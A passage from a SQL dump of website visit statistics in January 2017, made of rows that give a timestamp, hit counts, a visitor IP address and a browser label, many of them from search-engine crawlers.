1,1,0,0,'141.8.142.175','other'),(83286,1484430399,1,1,0,0,'40.77.167.23','other'),(83287,1484431253,1,1,0,0,'66.249.69.149','chrome'),(83288,1484431508,1,1,0,0,'163.172.64.223','other'),(83289,1484431552,1,1,0,0,'141.8.132.10','other'),(83290,1484432978,1,0,1,0,'66.249.75.183',''),(83291,1484433783,1,1,0,0,'163.172.64.222','other'),(83292,1484434575,1,1,0,0,'130.193.51.19','other'),(83293,1484434710,1,1,0,0,'141.8.142.67','other'),(83294,1484435479,1,1,0,0,'163.172.71.225','other'),(83295,1484436337,1,1,0,0,'141.8.132.10','other'),(83296,1484436511,1,1,0,0,'141.8.142.58','other'),(83297,1484436686,1,1,0,0,'141.8.142.67','other'),(83298,1484436812,1,1,0,0,'141.8.142.175','other'),(83299,1484437083,1,0,1,0,'66.249.75.183',''),(83300,1484438031,1,1,0,0,'141.8.183.19','other'),(83301,1484438779,1,1,0,0,'130.193.50.34','other'),(83302,1484438912,1,1,0,0,'93.158.152.84','other'),(83303,1484439422,1,1,0,0,'163.172.64.199','other'),(83304,1484439783,1,1,0,0,'163.172.64.242','other'),(83305,1484440285,1,1,0,0,'141.8.142.58','other'),(83306,1484440410,1,1,0,0,'130.193.50.34','other'),(83307,1484441419,1,0,1,0,'66.249.75.183',''),(83308,1484442715,1,1,0,0,'141.8.183.25','other'),(83309,1484442854,1,1,0,0,'141.8.142.175','other'),(83310,1484443771,1,1,0,0,'141.8.142.58','other'),(83311,1484443905,1,1,0,0,'130.193.50.6','other'),(83312,1484445160,1,0,1,0,'66.249.75.179',''),(83313,1484447022,1,1,0,0,'141.8.142.61','other'),(83314,1484447815,1,0,1,0,'66.249.69.152',''),(83315,1484447820,1,0,1,0,'66.249.75.183',''),(83316,1484447903,1,1,0,0,'141.8.142.58','other'),(83317,1484448742,1,1,0,0,'91.196.178.99','other'),(83318,1484450014,1,1,0,0,'109.173.59.141','other'),(83319,1484450270,1,1,0,0,'141.8.142.67','other'),(83320,1484450558,1,1,0,0,'157.55.39.225','other'),(83321,1484450705,1,1,0,0,'62.212.73.211','other'),(83322,1484451189,1,1,0,0,'130.193.50.34','other'),(83323,1484452999,1,0,1,0,'66.249.75.187',''),(83324,1484454143,1,1,0,0,'141.8.142.61','other'),(83325,1484454707,1,1,0,0,'141.8.142.58','other'),(83326,1484455301,1,1,0,0,'130.193.50.34','other'),(83327,1484455428,1,1,0,0,'141.8.183.19','other'),(83328,1484455708,1,0,1,0,'66.249.75.183',''),(83329,1484456654,1,1,0,0,'66.249.69.152','chrome'),(83330,1484457466,1,1,0,0,'163.172.64.231','other'),(83331,1484459099,2,0,2,0,'66.249.75.179',''),(83332,1484463386,1,1,0,0,'66.249.75.179','chrome'),(83333,1484463618,1,0,1,0,'66.249.69.152',''),(83334,1484463996,1,1,0,0,'66.102.9.25','chrome'),(83335,1484464184,1,0,1,0,'66.249.75.183',''),(83336,1484465303,1,1,0,0,'180.76.15.145','other'),(83337,1484465665,1,1,0,0,'95.132.135.185','chrome'),(83338,1484466206,1,1,0,0,'141.8.142.58','other'),(83339,1484466651,1,0,1,0,'66.249.75.179',''),(83340,1484467551,1,1,0,0,'66.249.69.152','chrome'),(83341,1484467797,1,0,1,0,'66.249.75.179',''),(83342,1484467972,1,1,0,0,'91.196.178.39','chrome'),(83343,1484468587,1,1,0,0,'141.8.183.25','other'),(83344,1484470652,1,1,0,0,'163.172.64.245','other'),(83345,1484471790,1,1,0,0,'66.249.69.149','chrome'),(83346,1484474297,2,0,2,0,'66.249.75.183',''),(83347,1484476029,1,1,0,0,'93.158.152.84','other'),(83348,1484476047,1,1,0,0,'163.172.64.241','other'),(83349,1484476622,1,0,1,0,'66.249.69.155',''),(83350,1484477685,2,0,2,0,'66.249.75.187',''),(83351,1484478073,1,0,1,0,'66.249.75.179',''),(83352,1484480045,1,1,0,0,'66.249.69.155','chrome'),(83353,1484480052,1,1,0,0,'130.193.50.34','other'),(83354,1484480460,1,1,0,0,'163.172.64.220','other'),(83355,1484480616,1,0,1,0,'66.249.75.179',''),(83356,1484482530,1,1,0,0,'92.113.126.12','chrome'),(83357,1484482611,1,1,0,0,'109.63.247.153','msie'),(83358,1484482676,1,0,1,0,'66.249.75.183',''),(83359,1484483893,1,1,0,0,'141.8.183.19','other'),(83360,1484485506,1,1,0,0,'43.231.29.14','firefox'),(83361,1484485868,1,0,1,0,'66.249.69.152',''),(83362,1484486743,1,1,0,0,'130.193.51.19','other'),(83363,1484486748,1,1,0,0,'95.132.179.158','firefox'),(83364,1484486761,1,1,0,0,'141.8.183.19','other'),(83365,1484487284,1,1,0,0,'91.196.178.133','chrome'),(83366,1484492090,1,0,1,0,'66.249.75.187',''),(83367,1484492943,1,1,0,0,'204.79.180.5','msie'),(83368,1484494218,1,1,0,0,'194.44.176.24','chrome'),(83369,1484494219,1,0,1,0,'66.249.75.183',''),(83370,1484495609,1,1,0,0,'163.172.64.245','other'),(83371,1484496343,1,0,1,0,'66.249.69.149',''),(83372,1484497208,1,1,0,0,'95.132.133.5','firefox'),(83373,1484497382,1,1,0,0,'91.196.178.132','chrome'),(83374,1484497455,1,0,1,0,'68.180.229.190',''),(83375,1484497808,1,1,0,0,'66.249.75.187','chrome'),(83376,1484498409,1,1,0,0,'91.196.178.132','chrome'),(83377,1484499677,1,0,1,0,'66.249.75.187',''),(83378,1484500758,1,0,1,0,'66.249.75.187',''),(83379,1484500903,1,0,1,0,'66.249.75.179',''),(83380,1484501685,1,1,0,0,'141.8.142.67','other'),(83381,1484502263,1,1,0,0,'178.140.87.197','msie'),(83382,1484502283,1,1,0,0,'66.249.75.183','chrome'),(83383,1484502721,1,0,1,0,'66.249.75.187',''),(83384,1484503282,1,1,0,0,'95.134.117.195','chrome'),(83385,1484504313,1,1,0,0,'163.172.64.183','other'),(83386,1484506381,1,1,0,0,'130.180.218.190','chrome'),(83387,1484507319,1,0,1,0,'66.249.75.187',''),(83388,1484507385,1,1,0,0,'180.76.15.163','other'),(83389,1484507397,1,0,1,0,'66.249.69.155',''),(83390,1484509664,1,1,0,0,'5.58.63.215','chrome'),(83391,1484510689,1,1,0,0,'66.249.69.152','chrome'),(83392,1484510753,1,1,0,0,'66.249.75.179','chrome'),(83393,1484510880,1,1,0,0,'163.172.64.245','other'),(83394,1484511338,1,1,0,0,'157.55.39.180','other'),(83395,1484512334,1,1,0,0,'40.77.167.26','other'),(83396,1484512501,1,1,0,0,'37.73.224.99','chrome'),(83397,1484512832,1,0,1,0,'66.249.69.152',''),(83398,1484516246,1,1,0,0,'91.196.178.70','chrome'),(83399,1484517556,1,1,0,0,'66.249.75.179','chrome'),(83400,1484518408,1,1,0,0,'163.172.64.253','other'),(83401,1484518455,1,1,0,0,'130.193.50.34','other'),(83402,1484521462,1,0,1,0,'66.249.69.149',''),(83403,1484521792,1,0,1,0,'66.249.75.179',''),(83404,1484523067,1,1,0,0,'66.249.69.152','chrome'),(83405,1484524094,1,1,0,0,'204.79.180.227','msie'),(83406,1484524794,1,1,0,0,'66.249.75.183','chrome'),(83407,1484526028,1,1,0,0,'66.249.75.183','chrome'),(83408,1484529337,2,2,0,0,'178.159.42.127','other'),(83409,1484531274,1,1,0,0,'163.172.64.235','other'),(83410,1484531837,1,0,1,0,'66.249.75.179',''),(83411,1484533845,1,0,1,0,'66.249.75.187',''),(83412,1484534764,1,1,0,0,'163.172.64.224','other'),(83413,1484535080,1,1,0,0,'66.249.75.179','chrome'),(83414,1484535329,1,1,0,0,'141.8.142.61','other'),(83415,1484536194,1,1,0,0,'163.172.64.236','other'),(83416,1484537199,1,0,1,0,'68.180.229.190',''),(83417,1484537631,1,1,0,0,'93.80.51.201','msie'),(83418,1484539359,1,1,0,0,'66.249.64.179','chrome'),(83419,1484542221,1,1,0,0,'141.8.142.58','other'),(83420,1484542491,1,0,1,0,'66.249.64.183',''),(83421,1484543123,1,1,0,0,'130.193.50.34','other'),(83422,1484543627,1,0,1,0,'66.249.64.179',''),(83423,1484543722,1,1,0,0,'163.172.64.183','other'),(83424,1484544544,1,1,0,0,'163.172.64.226','other'),(83425,1484544872,1,1,0,0,'130.180.217.240','chrome'),(83426,1484544884,1,1,0,0,'91.196.178.72','firefox'),(83427,1484546187,1,1,0,0,'91.196.178.72','firefox'),(83428,1484546971,1,1,0,0,'66.249.64.183','chrome'),(83429,1484547754,1,0,1,0,'68.180.229.254',''),(83430,1484547907,2,2,0,0,'91.196.178.70','firefox'),(83431,1484548116,1,1,0,0,'157.55.39.225','other'),(83432,1484548392,1,1,0,0,'66.102.9.25','chrome'),(83433,1484548559,1,0,1,0,'66.249.64.183',''),(83434,1484548637,1,1,0,0,'66.249.64.57','chrome'),(83435,1484549209,1,1,0,0,'130.193.50.34','other'),(83436,1484549239,1,1,0,0,'46.201.86.180','chrome'),(83437,1484549262,1,1,0,0,'141.8.142.58','other'),(83438,1484549653,1,0,1,0,'66.249.64.179',''),(83439,1484550800,1,1,0,0,'91.196.178.70','firefox'),(83440,1484551216,1,1,0,0,'91.196.178.71','chrome'),(83441,1484551632,1,1,0,0,'194.44.38.218','firefox'),(83442,1484551657,1,0,1,0,'66.249.64.179',''),(83443,1484551874,1,1,0,0,'95.134.213.89','chrome'),(83444,1484551908,1,1,0,0,'141.8.142.61','other'),(83445,1484553246,1,1,0,0,'195.154.181.162','chrome'),(83446,1484553700,1,0,1,0,'66.249.64.183',''),(83447,1484554289,1,0,1,0,'66.249.64.179',''),(83448,1484554691,1,1,0,0,'93.74.212.147','firefox'),(83449,1484555053,1,1,0,0,'91.196.177.26','chrome'),(83450,1484555114,3,3,0,0,'42.96.176.165','other'),(83451,1484555568,1,1,0,0,'91.196.178.70','firefox'),(83452,1484555684,2,0,2,0,'66.249.64.183',''),(83453,1484556829,1,1,0,0,'130.180.219.165','firefox'),(83454,1484557575,1,1,0,0,'91.196.178.71','firefox'),(83455,1484557628,1,1,0,0,'91.196.178.71','chrome'),(83456,1484557829,1,1,0,0,'163.172.64.186','other'),(83457,1484557833,1,1,0,0,'176.14.37.75','other'),(83458,1484558481,1,1,0,0,'195.49.151.99','chrome'),(83459,1484558585,1,1,0,0,'93.158.152.84','other'),(83460,1484558586,1,1,0,0,'141.8.183.19','other'),(83461,1484558992,1,0,1,0,'66.249.64.59',''),(83462,1484559942,1,1,0,0,'91.196.178.70','firefox'),(83463,1484560750,2,1,1,0,'66.249.64.179',''),(83464,1484560765,1,1,0,0,'66.249.64.59','chrome'),(83465,1484561464,1,1,0,0,'92.113.19.171','firefox'),(83466,1484562390,1,1,0,0,'31.43.144.121','chrome'),(83467,1484562393,1,1,0,0,'31.43.144.121','chrome'),(83468,1484562414,1,1,0,0,'91.196.178.72','chrome'),(83469,1484562753,2,1,1,0,'66.249.64.57',''),(83470,1484562803,1,0,1,0,'66.249.64.187',''),(83471,1484562935,1,1,0,0,'91.196.178.33','chrome'),(83472,1484563062,1,1,0,0,'91.196.177.26','chrome'),(83473,1484564122,1,1,0,0,'91.196.178.72','firefox'),(83474,1484564681,1,1,0,0,'66.249.64.183','chrome'),(83475,1484564775,1,1,0,0,'91.196.177.46','chrome'),(83476,1484565431,1,1,0,0,'163.172.64.185','other'),(83477,1484566227,1,1,0,0,'66.249.64.179','chrome'),(83478,1484566265,1,1,0,0,'157.55.39.41','other'),(83479,1484566733,1,0,1,0,'66.249.64.187',''),(83480,1484567016,1,1,0,0,'178.94.24.201','firefox'),(83481,1484567054,1,0,1,0,'66.249.64.183',''),(83482,1484567711,1,1,0,0,'141.8.142.67','other'),(83483,1484568042,1,1,0,0,'66.249.64.59','chrome'),(83484,1484568982,1,1,0,0,'91.196.178.72','chrome'),(83485,1484569058,1,1,0,0,'91.196.178.70','firefox'),(83486,1484569246,1,1,0,0,'91.196.178.33','chrome'),(83487,1484569371,1,1,0,0,'91.196.178.68','firefox'),(83488,1484569909,1,1,0,0,'91.196.178.132','chrome'),(83489,1484570187,1,1,0,0,'46.200.126.42','chrome'),(83490,1484570200,1,1,0,0,'130.193.50.34','other'),(83491,1484570509,1,0,1,0,'66.249.64.59',''),(83492,1484570709,1,1,0,0,'46.219.2.9','chrome'),(83493,1484570969,1,1,0,0,'91.196.178.135','firefox'),(83494,1484571596,1,1,0,0,'66.249.93.155','chrome'),(83495,1484571633,1,1,0,0,'204.79.180.240','msie'),(83496,1484571850,1,1,0,0,'31.43.18.210','chrome'),(83497,1484571869,1,1,0,0,'163.172.71.225','other'),(83498,1484572279,1,1,0,0,'178.92.138.234','chrome'),(83499,1484573266,1,1,0,0,'180.76.15.10','other'),(83500,1484573771,1,1,0,0,'91.196.178.39','firefox'),(83501,1484573876,4,4,0,0,'141.8.142.61','other'),(83502,1484573922,1,1,0,0,'141.8.142.67','other'),(83503,1484574007,2,2,0,0,'141.8.142.175','other'),(83504,1484574079,2,2,0,0,'130.193.50.34','other'),(83505,1484574145,1,0,1,0,'66.249.64.179',''),(83506,1484574169,1,1,0,0,'130.193.51.19','other'),(83507,1484574199,1,1,0,0,'94.179.116.16','firefox'),(83508,1484574497,2,2,0,0,'141.8.183.25','other'),(83509,1484574855,2,2,0,0,'141.8.142.61','other'),(83510,1484575187,1,1,0,0,'163.172.64.185','other'),(83511,1484575833,1,1,0,0,'130.193.50.34','other'),(83512,1484576200,1,1,0,0,'91.196.178.71','chrome'),(83513,1484576328,1,1,0,0,'141.8.142.58','other'),(83514,1484576423,1,1,0,0,'78.111.188.243','firefox'),(83515,1484576580,1,1,0,0,'46.165.197.141','other'),(83516,1484576597,1,1,0,0,'163.172.64.227','other'),(83517,1484576812,1,1,0,0,'130.193.51.19','other'),(83518,1484576876,1,1,0,0,'130.193.50.34','other'),(83519,1484577023,1,1,0,0,'141.8.183.19','other'),(83520,1484577334,2,2,0,0,'141.8.183.25','other'),(83521,1484577445,2,2,0,0,'141.8.142.61','other'),(83522,1484577559,1,1,0,0,'93.158.152.84','other'),(83523,1484577749,2,2,0,0,'130.193.51.19','other'),(83524,1484577948,2,2,0,0,'141.8.142.67','other'),(83525,1484578432,1,1,0,0,'141.8.142.61','other'),(83526,1484578608,2,2,0,0,'130.193.50.34','other'),(83527,1484578733,4,4,0,0,'141.8.142.175','other'),(83528,1484579169,1,1,0,0,'94.179.116.16','firefox'),(83529,1484579204,1,1,0,0,'130.193.51.19','other'),(83530,1484579598,1,1,0,0,'141.8.183.25','other'),(83531,1484580090,1,1,0,0,'176.121.254.28','firefox'),(83532,1484580108,1,1,0,0,'130.193.50.34','other'),(83533,1484580316,1,1,0,0,'91.196.177.15','chrome'),(83534,1484580561,1,0,1,0,'66.249.64.61',''),(83535,1484580796,1,1,0,0,'66.249.64.179','chrome'),(83536,1484581133,2,2,0,0,'141.8.183.25','other'),(83537,1484581134,1,1,0,0,'66.249.64.59','chrome'),(83538,1484581795,3,3,0,0,'130.193.50.34','other'),(83539,1484582542,1,1,0,0,'141.8.183.25','other'),(83540,1484582667,1,1,0,0,'141.8.142.61','other'),(83541,1484582712,1,1,0,0,'66.249.64.187','chrome'),(83542,1484582806,2,2,0,0,'141.8.142.175','other'),(83543,1484583343,1,1,0,0,'163.172.64.181','other'),(83544,1484584379,1,1,0,0,'95.132.133.217','chrome'),(83545,1484585131,1,1,0,0,'130.193.50.34','other'),(83546,1484585426,1,1,0,0,'93.158.152.9','other'),(83547,1484585598,1,1,0,0,'91.204.84.51','firefox'),(83548,1484588197,1,1,0,0,'110.77.148.71','chrome'),(83549,1484588292,1,1,0,0,'82.145.223.149','other'),(83550,1484588658,1,1,0,0,'46.211.66.40','chrome'),(83551,1484589394,1,0,1,0,'66.249.64.24',''),(83552,1484589553,1,1,0,0,'180.76.15.148','other'),(83553,1484590897,1,1,0,0,'37.55.226.51','firefox'),(83554,1484591055,1,1,0,0,'66.249.64.21','chrome'),(83555,1484591460,1,1,0,0,'94.178.7.61','chrome'),(83556,1484592865,1,1,0,0,'110.77.148.71','chrome'),(83557,1484593945,1,1,0,0,'91.196.178.72','firefox'),(83558,1484594258,1,1,0,0,'46.242.79.221','msie'),(83559,1484594306,1,0,1,0,'66.249.64.27',''),(83560,1484594848,1,1,0,0,'95.28.44.204','msie'),(83561,1484596426,1,1,0,0,'141.8.183.25','other'),(83562,1484596818,1,1,0,0,'141.8.142.175','other'),(83563,1484596961,2,2,0,0,'66.249.64.79','chrome'),(83564,1484597028,1,1,0,0,'66.249.64.24','chrome'),(83565,1484597843,1,1,0,0,'163.172.64.243','other'),(83566,1484598315,1,1,0,0,'180.76.15.144','other'),(83567,1484598752,1,0,1,0,'66.249.64.27',''),(83568,1484599291,1,1,0,0,'157.55.39.187','other'),(83569,1484599672,1,1,0,0,'130.193.51.19','other'),(83570,1484599825,1,1,0,0,'141.8.142.58','other'),(83571,1484600224,1,1,0,0,'141.8.142.67','other'),(83572,1484600615,1,1,0,0,'163.172.64.226','other'),(83573,1484600894,1,1,0,0,'66.249.64.74','chrome'),(83574,1484601099,1,1,0,0,'176.104.191.248','firefox'),(83575,1484601104,1,0,1,0,'66.249.64.27',''),(83576,1484602034,1,1,0,0,'66.249.64.74','chrome'),(83577,1484602235,1,0,1,0,'66.249.64.27',''),(83578,1484602317,1,1,0,0,'141.8.142.58','other'),(83579,1484602447,1,1,0,0,'130.193.50.34','other'),(83580,1484602662,2,2,0,0,'157.55.39.187','other'),(83581,1484603011,1,0,1,0,'66.249.64.21',''),(83582,1484603041,1,1,0,0,'66.249.64.21','chrome'),(83583,1484605988,1,1,0,0,'141.8.142.61','other'),(83584,1484606387,1,1,0,0,'176.195.113.49','msie'),(83585,1484606564,1,0,1,0,'66.249.64.74',''),(83586,1484606825,1,0,1,0,'66.249.64.27',''),(83587,1484607106,1,1,0,0,'141.8.183.25','other'),(83588,1484607814,1,0,1,0,'66.249.64.24',''),(83589,1484608329,1,1,0,0,'66.249.64.74','chrome'),(83590,1484608526,1,1,0,0,'130.193.50.34','other'),(83591,1484608936,1,0,1,0,'66.249.64.27',''),(83592,1484609664,1,1,0,0,'141.8.142.61','other'),(83593,1484609785,1,1,0,0,'134.249.149.101','chrome'),(83594,1484609799,1,1,0,0,'130.193.51.19','other'),(83595,1484610006,1,1,0,0,'141.8.142.175','other'),(83596,1484610167,1,1,0,0,'163.172.64.187','other'),(83597,1484610246,1,1,0,0,'130.193.50.6','other'),(83598,1484611526,1,1,0,0,'157.55.39.41','other'),(83599,1484611777,1,1,0,0,'141.8.142.175','other'),(83600,1484611846,4,4,0,0,'173.208.251.106','other'),(83601,1484612047,1,0,1,0,'66.249.64.24',''),(83602,1484612246,1,0,1,0,'66.249.64.21',''),(83603,1484613775,1,1,0,0,'141.8.183.25','other'),(83604,1484615710,1,1,0,0,'66.249.64.79','chrome'),(83605,1484615914,1,1,0,0,'40.77.167.26','other'),(83606,1484616402,1,1,0,0,'176.195.112.220','msie'),(83607,1484616413,1,0,1,0,'66.249.64.27',''),(83608,1484617576,1,0,1,0,'66.249.64.24',''),(83609,1484617746,1,1,0,0,'141.8.142.67','other'),(83610,1484617849,1,0,1,0,'66.249.64.69',''),(83611,1484618764,1,1,0,0,'66.249.64.24','chrome'),(83612,1484619837,1,0,1,0,'66.249.64.21',''),(83613,1484621928,1,1,0,0,'176.195.101.86','msie'),(83614,1484622069,1,0,1,0,'66.249.64.27',''),(83615,1484622149,2,2,0,0,'141.8.183.25','other'),(83616,1484622163,1,1,0,0,'163.172.64.181','other'),(83617,1484623417,3,3,0,0,'130.193.51.19','other'),(83618,1484623433,1,1,0,0,'130.193.50.34','other'),(83619,1484623436,1,1,0,0,'141.8.142.61','other'),(83620,1484624617,1,1,0,0,'141.8.142.58','other'),(83621,1484624822,1,1,0,0,'66.249.64.21','chrome'),(83622,1484625193,1,1,0,0,'130.193.50.34','other'),(83623,1484625434,1,1,0,0,'163.172.64.253','other'),(83624,1484625538,1,1,0,0,'141.8.183.25','other'),(83625,1484625889,1,1,0,0,'141.8.142.61','other'),(83626,1484626046,2,2,0,0,'141.8.142.58','other'),(83627,1484626358,1,1,0,0,'130.193.50.34','other'),(83628,1484626612,1,1,0,0,'130.193.51.19','other'),(83629,1484627176,1,1,0,0,'40.77.167.26','other'),(83630,1484627660,1,1,0,0,'66.102.9.29','chrome'),(83631,1484628704,2,2,0,0,'141.8.142.175','other'),(83632,1484629147,1,1,0,0,'141.8.142.61','other'),(83633,1484629958,1,0,1,0,'66.249.64.24',''),(83634,1484630070,1,1,0,0,'130.193.51.19','other'),(83635,1484630420,1,1,0,0,'141.8.142.175','other'),(83636,1484630544,1,1,0,0,'141.8.142.61','other'),(83637,1484630678,1,1,0,0,'157.55.39.225','other'),(83638,1484631649,2,2,0,0,'141.8.142.58','other'),(83639,1484631809,1,1,0,0,'91.196.178.68','firefox'),(83640,1484632390,1,1,0,0,'141.8.183.25','other'),(83641,1484632631,1,0,1,0,'66.249.64.21',''),(83642,1484632896,1,1,0,0,'141.8.142.67','other'),(83643,1484633527,1,0,1,0,'66.249.64.24',''),(83644,1484633529,1,1,0,0,'130.193.51.19','other'),(83645,1484633747,2,2,0,0,'141.8.142.61','other'),(83646,1484633798,1,1,0,0,'91.196.178.70','firefox'),(83647,1484633872,2,2,0,0,'141.8.183.25','other'),(83648,1484633966,1,1,0,0,'91.196.178.68','firefox'),(83649,1484634435,1,0,1,0,'66.249.64.21',''),(83650,1484634471,1,0,1,0,'66.249.64.24',''),(83651,1484634885,1,0,1,0,'66.249.64.27',''),(83652,1484635295,1,1,0,0,'94.179.147.66','firefox'),(83653,1484635840,1,1,0,0,'91.196.178.70','firefox'),(83654,1484636200,1,1,0,0,'46.201.241.5','chrome'),(83655,1484636210,1,1,0,0,'141.8.142.175','other'),(83656,1484636516,1,0,1,0,'66.249.64.21',''),(83657,1484637194,1,1,0,0,'141.8.142.58','other'),(83658,1484637250,1,1,0,0,'91.196.178.66','chrome'),(83659,1484638283,1,1,0,0,'130.193.50.34','other'),(83660,1484638440,1,0,1,0,'66.249.64.27',''),(83661,1484638514,1,1,0,0,'176.107.196.103','chrome'),(83662,1484638615,1,1,0,0,'37.144.43.221','msie'),(83663,1484639176,1,1,0,0,'141.8.142.175','other'),(83664,1484639410,1,1,0,0,'141.8.183.25','other'),(83665,1484639440,1,1,0,0,'66.249.64.79','chrome'),(83666,1484639537,1,1,0,0,'130.193.51.19','other'),(83667,1484640426,1,1,0,0,'91.196.177.94','firefox'),(83668,1484641013,1,1,0,0,'141.8.142.175','other'),(83669,1484641220,1,1,0,0,'94.179.147.66','firefox'),(83670,1484641376,1,1,0,0,'91.196.178.70','firefox'),(83671,1484641426,1,1,0,0,'130.193.50.34','other'),(83672,1484642276,1,1,0,0,'94.179.147.66','firefox'),(83673,1484642430,1,1,0,0,'91.196.178.70','firefox'),(83674,1484642981,1,1,0,0,'79.165.163.100','msie'),(83675,1484643429,2,2,0,0,'91.196.177.46','firefox'),(83676,1484643451,28,28,0,0,'163.172.68.121','other'),(83677,1484643754,1,1,0,0,'37.73.196.147','chrome'),(83678,1484644431,1,1,0,0,'95.135.241.187','chrome'),(83679,1484644496,1,1,0,0,'141.8.183.25','other'),(83680,1484644866,1,0,1,0,'66.249.64.21',''),(83681,1484644939,1,1,0,0,'91.196.178.129','chrome'),(83682,1484644967,1,1,0,0,'141.8.183.19','other'),(83683,1484645014,1,1,0,0,'46.219.2.9','chrome'),(83684,1484645180,1,1,0,0,'163.172.64.232','other'),(83685,1484645859,1,1,0,0,'92.113.201.117','chrome'),(83686,1484646644,1,1,0,0,'91.196.178.38','chrome'),(83687,1484647110,1,1,0,0,'91.196.178.72','firefox'),(83688,1484647127,1,1,0,0,'95.135.241.187','chrome'),(83689,1484647452,1,1,0,0,'37.73.223.250','chrome'),(83690,1484647600,1,1,0,0,'91.196.178.72','chrome'),(83691,1484647728,1,1,0,0,'91.196.178.129','chrome'),(83692,1484648287,1,1,0,0,'95.135.241.187','chrome'),(83693,1484648993,1,1,0,0,'91.196.178.66','chrome'),(83694,1484649637,1,1,0,0,'91.196.177.28','chrome'),(83695,1484649801,1,1,0,0,'91.196.178.72','firefox'),(83696,1484649977,1,0,1,0,'66.249.64.21',''),(83697,1484650394,1,1,0,0,'178.94.2.116','firefox'),(83698,1484650461,1,1,0,0,'188.190.163.8','chrome'),(83699,1484650466,1,1,0,0,'157.55.39.187','other'),(83700,1484650482,2,2,0,0,'37.55.225.151','chrome'),(83701,1484650600,1,1,0,0,'180.76.15.13','other'),(83702,1484650615,1,1,0,0,'163.172.71.225','other'),(83703,1484650850,1,1,0,0,'141.8.183.25','other'),(83704,1484650858,1,1,0,0,'91.196.177.134','chrome'),(83705,1484651385,1,1,0,0,'91.196.178.67','firefox'),(83706,1484652232,1,1,0,0,'141.8.142.175','other'),(83707,1484652668,1,0,1,0,'66.249.64.24',''),(83708,1484652689,1,1,0,0,'46.200.223.193','firefox'),(83709,1484652978,1,1,0,0,'130.193.51.19','other'),(83710,1484654191,1,1,0,0,'130.180.219.122','firefox'),(83711,1484654594,1,1,0,0,'188.190.163.8','chrome'),(83712,1484655093,1,1,0,0,'141.8.142.61','other'),(83713,1484655359,1,1,0,0,'130.193.50.34','other'),(83714,1484655455,2,0,2,0,'66.249.64.24',''),(83715,1484655639,1,1,0,0,'130.193.51.19','other'),(83716,1484656012,1,1,0,0,'37.52.18.6','firefox'),(83717,1484657336,1,1,0,0,'130.193.51.19','other'),(83718,1484657445,1,1,0,0,'46.211.0.65','other'),(83719,1484657878,1,1,0,0,'178.92.63.116','opera'),(83720,1484658326,2,2,0,0,'141.8.142.58','other'),(83721,1484658615,1,1,0,0,'94.179.147.66','firefox'),(83722,1484658864,1,1,0,0,'95.133.238.189','chrome'),(83723,1484659083,1,1,0,0,'37.55.57.181','chrome'),(83724,1484659258,2,2,0,0,'141.8.183.25','other'),(83725,1484659491,1,1,0,0,'91.196.178.136','chrome'),(83726,1484659515,1,1,0,0,'180.76.15.13','other'),(83727,1484659965,1,1,0,0,'37.52.18.6','firefox'),(83728,1484660188,1,1,0,0,'91.196.178.70','firefox'),(83729,1484660442,1,1,0,0,'195.154.181.162','chrome'),(83730,1484660994,1,1,0,0,'95.24.157.30','msie'),(83731,1484661535,1,0,1,0,'66.249.64.27',''),(83732,1484661576,1,1,0,0,'94.178.254.133','chrome'),(83733,1484661735,1,1,0,0,'178.214.207.74','chrome'),(83734,1484661746,1,1,0,0,'37.52.18.6','firefox'),(83735,1484661988,1,0,1,0,'66.249.64.21',''),(83736,1484662576,1,1,0,0,'94.179.61.98','chrome'),(83737,1484662614,1,1,0,0,'130.193.51.14','other'),(83738,1484662650,1,1,0,0,'95.135.90.88','chrome'),(83739,1484662851,1,1,0,0,'130.193.50.34','other'),(83740,1484662974,1,1,0,0,'94.179.147.66','firefox'),(83741,1484663070,1,1,0,0,'188.190.163.8','chrome'),(83742,1484663128,1,1,0,0,'141.8.142.58','other'),(83743,1484663526,1,1,0,0,'91.196.178.67','firefox'),(83744,1484663783,1,0,1,0,'66.249.64.21',''),(83745,1484663809,1,1,0,0,'94.178.254.133','chrome'),(83746,1484664148,1,0,1,0,'66.249.64.27',''),(83747,1484664678,2,2,0,0,'141.8.142.58','other'),(83748,1484665126,2,2,0,0,'130.193.51.19','other'),(83749,1484665220,1,1,0,0,'141.8.183.19','other'),(83750,1484665604,1,1,0,0,'91.195.172.246','chrome'),(83751,1484665739,1,0,1,0,'66.249.64.74',''),(83752,1484665906,1,1,0,0,'141.8.142.58','other'),(83753,1484666015,4,4,0,0,'130.193.50.34','other'),(83754,1484667030,1,1,0,0,'141.8.142.175','other'),(83755,1484667155,2,2,0,0,'141.8.183.25','other'),(83756,1484667360,1,0,1,0,'66.249.64.27',''),(83757,1484668221,1,1,0,0,'141.8.142.175','other'),(83758,1484668347,1,1,0,0,'130.193.51.19','other'),(83759,1484668624,1,0,1,0,'66.249.64.27',''),(83760,1484668874,1,1,0,0,'163.172.64.228','other'),(83761,1484669199,1,1,0,0,'141.8.183.25','other'),(83762,1484670904,2,0,2,0,'66.249.64.24',''),(83763,1484671126,1,1,0,0,'46.109.25.167','firefox'),(83764,1484671158,1,1,0,0,'163.172.64.243','other'),(83765,1484671293,1,0,1,0,'66.249.64.21',''),(83766,1484672095,1,1,0,0,'94.179.41.66','chrome'),(83767,1484672210,1,1,0,0,'180.76.15.156','other'),(83768,1484673304,1,0,1,0,'66.249.64.21',''),(83769,1484673393,1,1,0,0,'78.111.185.30','chrome'),(83770,1484673825,1,1,0,0,'91.196.177.15','firefox'),(83771,1484674689,1,1,0,0,'66.102.9.29','chrome'),(83772,1484674701,1,1,0,0,'141.8.142.58','other'),(83773,1484674903,1,1,0,0,'46.211.70.126','chrome'),(83774,1484675060,1,1,0,0,'130.193.51.19','other'),(83775,1484676033,1,0,1,0,'66.249.64.24',''),(83776,1484676094,1,1,0,0,'130.193.50.34','other'),(83777,1484676217,2,2,0,0,'141.8.142.175','other'),(83778,1484676504,1,1,0,0,'141.8.183.25','other'),(83779,1484678485,1,1,0,0,'141.8.183.25','other'),(83780,1484678917,1,1,0,0,'91.196.178.164','chrome'),(83781,1484679286,2,2,0,0,'130.193.50.34','other'),(83782,1484679419,1,1,0,0,'141.8.183.25','other'),(83783,1484679469,1,1,0,0,'180.76.15.21','other'),(83784,1484680099,1,1,0,0,'188.190.55.58','chrome'),(83785,1484680260,1,1,0,0,'141.8.142.175','other'),(83786,1484680348,1,1,0,0,'163.172.64.228','other'),(83787,1484680520,1,1,0,0,'40.77.167.26','other'),(83788,1484681228,2,2,0,0,'130.193.50.34','other'),(83789,1484681784,1,1,0,0,'163.172.64.234','other'),(83790,1484682108,2,2,0,0,'141.8.142.175','other'),(83791,1484682286,3,3,0,0,'130.193.50.34','other'),(83792,1484682612,1,0,1,0,'66.249.64.21',''),(83793,1484683297,1,0,